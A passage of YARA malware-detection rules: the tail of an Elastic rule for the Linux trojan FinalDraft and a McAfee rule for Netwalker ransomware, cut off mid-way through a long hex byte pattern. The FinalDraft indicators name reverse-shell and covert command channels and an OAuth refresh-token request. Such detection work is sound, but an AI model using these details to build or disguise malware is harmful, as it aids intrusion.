    id = "4ea5a204-5136-42c2-80f0-634368936296"
    fingerprint = "86cc29da59c8801d7443851e2c16f04d187de9705b16cc7fca553ea09baf0eb8"
    creation_date = "2025-01-23"
    last_modified = "2025-02-04"
    threat_name = "Linux.Trojan.FinalDraft"
    reference_sample = "83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c"
    severity = 100
    arch_context = "x86"
    scan_context = "file, memory"
    license = "Elastic License v2"
    os = "linux"
  strings:
    $str_comm_option_1 = "CBindTcpTransChannel"
    $str_comm_option_2 = "CDnsTransChannel"
    $str_comm_option_3 = "CHttpTransChannel"
    $str_comm_option_4 = "CIcmpTransChannel"
    $str_comm_option_5 = "COutLookTransChannel"
    $str_comm_option_6 = "CReverseTcpTransChannel"
    $str_comm_option_7 = "CReverseUdpTransChannel"
    $str_comm_option_8 = "CWebTransChannel"
    $str_feature_1 = "%s?type=del&id=%s" fullword
    $str_feature_2 = "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&grant_type=refresh_token" fullword
    $str_feature_3 = "/var/log/installlog.log.%s" fullword
    $str_feature_4 = "/mnt/hgfsdisk.log.%s" fullword
    $str_feature_5 = "%-10s %-25s %-25s %-15s" fullword
    $str_feature_6 = "%-20s %-10s %-10s %-10s %-30s" fullword
    $str_feature_7 = { 48 39 F2 74 ?? 48 0F BE 0A 48 FF C2 48 6B C0 ?? 48 01 C8 EB ?? }
  condition:
    (1 of ($str_comm_option*)) and (3 of ($str_feature_*))
}

rule netwalker_ransomware {
  meta:
    description = "Rule to detect Netwalker ransomware"
    author = "McAfee ATR Team"
    date = "2020-03-30"
    rule_version = "v1"
    malware_type = "ransomware"
    reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
    note = "The rule doesn't detect the samples packed with UPX"
  strings:
    $pattern = { 8B ?? ?? 8B ?? ?? 89 ?? C7 ?? ?? ?? ?? ?? ?? EB ?? 8B ?? ?? 52 E8 ?? ?? ?? ?? 83 ?? ?? 8B ?? ?? 8B ?? 5D C3 CC CC CC CC CC CC CC CC CC CC CC CC 55 8B ?? 83 ?? ?? C7 ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 83 ?? ?? ?? 72 ?? 83 ?? ?? ?? 75 ?? 8B ?? ?? E9 ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? 8B ?? ?? 33 ?? B9 ?? ?? ?? ?? F7 ?? 83 ?? ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8D ?? ?? 51 E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? 83 ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? C6 ?? ?? ?? C6 ?? ?? ?? 8B ?? ?? 3B ?? ?? 0F 84 ?? ?? ?? ?? 8B ?? ?? 2B ?? ?? 39 ?? ?? 73 ?? 8B ?? ?? 89 ?? ?? EB ?? 8B ?? ?? 2B ?? ?? 89 ?? ?? 8B ?? ?? 89 ?? ?? C7 ?? ?? ?? ?? ?? ?? 8B ?? ?? 03 ?? ?? 8B ?? ?? 2B ?? 89 ?? ?? 74 ?? 83 ?? ?? ?? 7E ?? 83 ?? ?? ?? 7D ?? C7 ?? ?? ?? ?? ?? ?? 8B ?? ?? 03 ?? ?? 89 ?? ?? 8B ?? ?? 51 8B ?? ?? 03 ?? ?? 52 8B ?? ?? 03 ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? 8B ?? ?? 03 ?? ?? 89 ?? ?? 83 ?? ?? ?? 75 ?? 6A ?? 8D ?? ?? 52 8B ?? ?? 03 ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 8B ?? ?? 03 ?? ?? 89 ?? ?? E9 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 89 ?? 83 ?? ?? ?? 74 ?? 8B ?? ?? 52 E8 ?? ?? ?? ?? 83 ?? ?? 8B ?? ?? 89 ?? C7 ?? ?? ?? ?? ?? ?? 8B ?? ?? 8B ?? 5D C3 CC CC CC CC 55 8B ?? 51 B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 89 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? 81 ?? ?? ?? ?? ?? ?? 75 ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? C7 ?? ?? ?? ?? ?? ?? EB ?? C7 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 89 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F BE ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F BE ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 89 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? D1 ?? 8B ?? ?? 89 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F BE ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? 8B ?? 5D C3 CC CC CC 55 8B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? C7 ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? C7 ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? D1 ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 0F B6 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? 5D C3 CC CC CC 55 8B ?? 83 ?? ?? 83 ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 8B ?? ?? 50 8D ?? ?? 51 E8 ?? ?? ?? ?? 83 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 8B ?? ?? 83 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 83 ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 8B ?? ?? 83 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? 89 ?? ?? 83 ?? ?? ?? 77 ?? C7 ?? ?? ?? ?? ?? ?? EB ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 8B ?? ?? 3B ?? ?? 73 ?? 8B ?? ?? 03 ?? ?? 0F B6 ?? 8B ?? ?? 0F B6 ?? ?? ?? 33 ?? 8B ?? ?? 03 ?? ?? 88 ?? EB ?? EB ?? C7 ?? ?? ?? ?? ?? ?? EB ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 83 ?? ?? ?? 73 ?? 8B ?? ?? 03 ?? ?? 0F B6 ?? 8B ?? ?? 0F B6 ?? ?? ?? 33 ?? 8B ?? ?? 03 ?? ?? 88 ?? EB ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? E9 ?? ?? ?? ?? 8B ?? 5D C3 CC CC CC CC CC CC CC CC 55 8B ?? 83 ?? ?? C7 ?? ?? ?? ?? ?? ?? EB ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 83 ?? ?? ?? 7D ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 89 ?? ?? ?? EB ?? C7 ?? ?? ?? ?? ?? ?? EB ?? 8B ?? ?? 83 ?? ?? 89 ?? ?? 83 ?? ?? ?? 0F 8E ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? C1 ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? D1 ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? BA ?? ?? ?? ?? D1 ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? D1 ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? D1 ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B8 ?? ?? ?? ?? D1 ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? D1 ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? BA ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? D1 ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B9 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 03 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? B9 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? B8 ?? ?? ?? ?? 6B ?? ?? 8B ?? ?? ?? 33 ?? ?? ?? C1 ?? ?? 0B ?? B8 ?? ?? ?? ?? 6B ?? ?? 89 ?? ?? ?? BA ?? ?? ?? ?? 6B ?? ?? }
    $pattern2 = { CC CC CC CC CC A1 ?? ?? ?? ?? C3 CC CC CC CC CC CC CC CC CC CC 53 8B ?? ?? ?? 55 33 ?? 57 85 ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 8B ?? ?? 85 ?? 74 ?? C1 ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? 85 ?? 74 ?? 8B ?? ?? 56 33 ?? 85 ?? 74 ?? 56 53 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? 8B ?? ?? 85 ?? 74 ?? 8D ?? ?? ?? 89 ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? 8B ?? ?? 8B ?? 8B ?? ?? ?? 89 ?? ?? FF ?? ?? 8B ?? ?? 46 3B ?? 72 ?? 39 ?? ?? B9 ?? ?? ?? ?? 5E 0F 44 ?? 5F 8B ?? 5D 5B C3 5F 5D 33 ?? 5B C3 CC CC CC CC CC CC CC CC CC CC CC CC CC CC 53 55 56 57 8B ?? ?? ?? 85 ?? 74 ?? 83 ?? ?? 74 ?? 8B ?? ?? 85 ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 33 ?? 85 ?? 74 ?? 8B ?? ?? ?? 66 0F 1F ?? ?? ?? 85 ?? 74 ?? 8B ?? 53 FF ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? FF ?? ?? 8B ?? 53 FF ?? 83 ?? ?? 85 ?? 75 ?? 46 3B ?? ?? 72 ?? 5F 5E 5D 33 ?? 5B C3 5F 5E 5D B8 ?? ?? ?? ?? 5B C3 CC CC CC CC CC CC CC CC CC CC CC CC CC CC CC 6A ?? FF ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? C3 CC CC CC CC CC CC CC CC CC CC CC CC CC 6A ?? FF ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? C3 CC CC CC CC CC CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 56 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 56 E8 ?? ?? ?? ?? 8B ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 75 ?? A1 ?? ?? ?? ?? 6A ?? 83 ?? ?? 56 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 75 ?? 56 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? 8D ?? ?? 66 ?? ?? ?? 74 ?? 83 ?? ?? 83 ?? ?? 75 ?? 33 ?? 5E C3 83 ?? ?? 74 ?? A1 ?? ?? ?? ?? 6A ?? 83 ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? 5E C3 CC CC CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? A1 ?? ?? ?? ?? 6A ?? 83 ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? C3 33 ?? C3 CC CC CC CC CC CC CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 56 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 56 E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 75 ?? 83 ?? ?? ?? 74 ?? 66 ?? ?? ?? ?? 75 ?? 0F B7 ?? 83 ?? ?? 72 ?? 83 ?? ?? 76 ?? 83 ?? ?? 66 ?? ?? ?? 76 ?? 6A ?? 8D ?? ?? 56 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? 5E C3 33 ?? 5E C3 CC CC CC CC CC CC CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 6A ?? 05 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? C3 33 ?? C3 CC CC CC 83 ?? ?? ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? 6A ?? 05 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? C3 33 ?? C3 CC CC CC 83 ?? ?? ?? ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 6A ?? 83 ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? C3 33 ?? C3 CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 6A ?? 83 ?? ?? 51 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? C3 33 ?? C3 CC CC CC CC CC CC CC CC 83 ?? ?? ?? ?? ?? ?? 56 74 ?? 8B ?? ?? ?? 85 ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 51 E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? 8B ?? ?? ?? ?? ?? 6A ?? 83 ?? ?? 56 51 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? B8 ?? ?? ?? ?? 5E C3 56 E8 ?? ?? ?? ?? 83 ?? ?? 33 ?? 5E C3 CC CC CC CC CC CC CC 53 55 56 57 6A ?? E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? 8B ?? 66 0F 1F ?? ?? ?? 0F B7 ?? ?? 83 ?? ?? 51 E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? 0F B7 ?? ?? 51 FF ?? ?? 57 E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 74 ?? 6A ?? 83 ?? ?? 57 50 E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 8B ?? ?? 3B ?? ?? 74 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 6A ?? 53 8B ?? ?? FF ?? E8 ?? ?? ?? ?? 53 8B ?? ?? ?? ?? ?? FF ?? 57 E8 ?? ?? ?? ?? 83 ?? ?? 8B ?? 03 ?? 85 ?? 0F 85 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? ?? ?? ?? FF ?? E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 83 ?? ?? 55 33 ?? 56 57 39 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 85 ?? 0F 84 